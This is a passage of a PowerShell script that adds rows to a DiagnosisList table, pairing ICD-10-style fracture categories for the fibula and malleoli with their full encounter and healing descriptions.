closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left fibula","Other fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified fibula","Other fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of right tibia","Displaced fracture of medial malleolus of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of left tibia","Displaced fracture of medial malleolus of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial malleolus of unspecified tibia","Displaced fracture of medial malleolus of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of right tibia","Nondisplaced fracture of medial malleolus of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of left tibia","Nondisplaced fracture of medial malleolus of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial malleolus of unspecified tibia","Nondisplaced fracture of medial malleolus of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of right fibula","Displaced fracture of lateral malleolus of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of left fibula","Displaced fracture of lateral malleolus of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral malleolus of unspecified fibula","Displaced fracture of lateral malleolus of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral malleolus of right fibula","Nondisplaced fracture of lateral malleolus of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced 